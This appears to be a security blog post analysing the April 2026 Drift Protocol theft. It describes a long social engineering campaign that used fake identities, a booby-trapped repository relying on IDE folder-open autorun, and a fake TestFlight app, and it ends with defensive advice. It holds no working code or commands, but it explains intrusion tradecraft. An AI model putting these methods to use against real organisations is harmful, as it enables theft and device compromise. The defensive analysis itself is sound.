Drift Protocol, one of the largest decentralized exchanges on Solana, published their incident report this week. On April 1, 2026, approximately $285 million was drained from the protocol. The attack was not a smart contract exploit. It was the result of a six-month social engineering operation attributed with medium-high confidence to UNC4736, a North Korean state-affiliated threat group.
This is the same group behind the $50 million Radiant Capital hack in October 2024. The attribution is supported by onchain fund flows and operational pattern overlaps confirmed by the SEAL 911 team, TRM Labs, and Elliptic. Mandiant has been engaged for device forensics.
What makes this incident worth studying is not the dollar amount. It is the operational tradecraft.
How the operation worked
In Fall 2025, a group of individuals approached Drift contributors at a major cryptocurrency conference. They presented themselves as a quantitative trading firm looking to integrate with the protocol. They were technically fluent, familiar with how Drift operated, and had verifiable professional backgrounds.
A Telegram group was established after the first meeting. Over the following months, the group engaged Drift contributors in substantive conversations about trading strategies, vault integrations, and product details. These interactions were indistinguishable from how legitimate trading firms typically onboard with DeFi protocols.
Between December 2025 and January 2026, they onboarded an Ecosystem Vault on Drift. They deposited over $1 million of their own capital. They participated in multiple working sessions and asked detailed, informed product questions.
Throughout February and March 2026, various Drift contributors met individuals from this group again, face-to-face, at multiple major industry conferences in multiple countries. By this point, the relationship was nearly half a year old.
The attack vectors
Drift's forensic review identified three potential intrusion vectors:
Malicious code repository. One contributor cloned a code repository shared by the group under the guise of deploying a frontend for their vault. The repo likely exploited a known vulnerability in VSCode and Cursor where simply opening a file or folder silently executes arbitrary code with no prompt or warning.
Fake TestFlight application. A second contributor was induced to download a TestFlight application the group presented as their wallet product.
IDE vulnerability exploitation. The VSCode/Cursor vulnerability was actively flagged by the security community from December 2025 through February 2026. Opening a repository in the editor was sufficient to execute code silently, with no permissions dialog or indication of any kind.
When the exploit executed on April 1, the attackers simultaneously scrubbed their Telegram chat histories and removed all malicious software from compromised devices.
The attribution
The SEAL 911 team assessed with medium-high confidence that the operation was carried out by the same threat actors responsible for the October 2024 Radiant Capital hack. Mandiant tracks this group as UNC4736, also known as AppleJeus or Citrine Sleet. The connection is based on onchain fund flows used to stage and test the Drift operation tracing back to the Radiant attackers, and operational overlaps with known DPRK-linked activity.
The individuals who appeared in person were not North Korean nationals. DPRK threat actors operating at this level deploy third-party intermediaries to conduct face-to-face relationship-building. The profiles used in this operation had fully constructed identities including employment histories, public-facing credentials, and professional networks that could withstand scrutiny during a business relationship.
Why this matters beyond crypto
It is tempting to file this under "crypto problems." That would be a mistake.
The tradecraft used here is not specific to DeFi. State-level actors building fabricated identities, attending industry conferences, establishing real business relationships, and then compromising devices through shared code repositories or demo applications. Every one of those steps maps directly onto how B2B SaaS companies evaluate and onboard partners, vendors, and integrators.
Consider what this operation required:
Six months of sustained engagement with a target organization
Over $1 million in capital deployed to establish credibility
Multiple in-person meetings across countries with non-attributed intermediaries
Fabricated professional identities that survived months of due diligence
Weaponization of standard developer tools (code repos, IDE vulnerabilities, TestFlight)
Most organizations are not prepared for this level of patience and resource commitment from an attacker. Security awareness training covers phishing emails and suspicious links. It does not cover a counterparty who has been attending your industry events, contributing real capital, and building genuine-looking operational history for half a year.
The IDE blind spot
The VSCode/Cursor vulnerability deserves special attention. Oasis Security disclosed this flaw in September 2025. Cursor ships with Workspace Trust disabled by default, meaning a project can include a hidden autorun instruction that executes code the moment you open the folder. No prompt. No consent.
Developer laptops typically have access to cloud keys, personal access tokens, API credentials, and SaaS sessions. A booby-trapped repository can pivot from one machine to CI/CD pipelines and cloud infrastructure in minutes.
If your engineering team regularly clones repositories from external collaborators, partners, or open-source projects, this attack vector applies to you. It does not require the victim to run any code. Opening the folder is enough.
What to do about it
Drift's post-mortem includes a clear recommendation: check in on your teams, audit who has access to what, and treat every device that touches your signing infrastructure as a potential target. Here is a more specific list for B2B SaaS teams:
Enable Workspace Trust in VSCode and Cursor. This blocks autorun tasks from untrusted repositories. It should be enforced across your engineering org, not left as an individual setting.
Audit external code before opening it. Search for .vscode/tasks.json files with runOn: folderOpen in any repository shared by external parties. Treat shared repos from partners with the same suspicion as random open-source dependencies.
Segment devices that have privileged access. Laptops that touch production signing keys, admin consoles, or multisig infrastructure should not be the same machines used for general development, conference demos, or partner collaboration.
Require secondary approval for high-impact actions. Any action that can move significant funds, modify access controls, or alter production infrastructure should require approval from a second party on a separate device.
Treat partner onboarding as a security process, not just a business one. Verifiable LinkedIn profiles and conference appearances are not identity verification. If a partner relationship involves sharing code, granting system access, or integrating infrastructure, apply the same rigor you would to a vendor security review.
The bottom line
The Drift exploit is a case study in what happens when a well-resourced adversary decides that the cheapest way into your systems is through your relationships. The attackers did not need a zero-day in Drift's code. They needed a handshake, six months of patience, and a repository that opened in the wrong IDE.
"We know who we're working with" is not a security control. It is an assumption. And assumptions are what state-level threat actors are trained to exploit.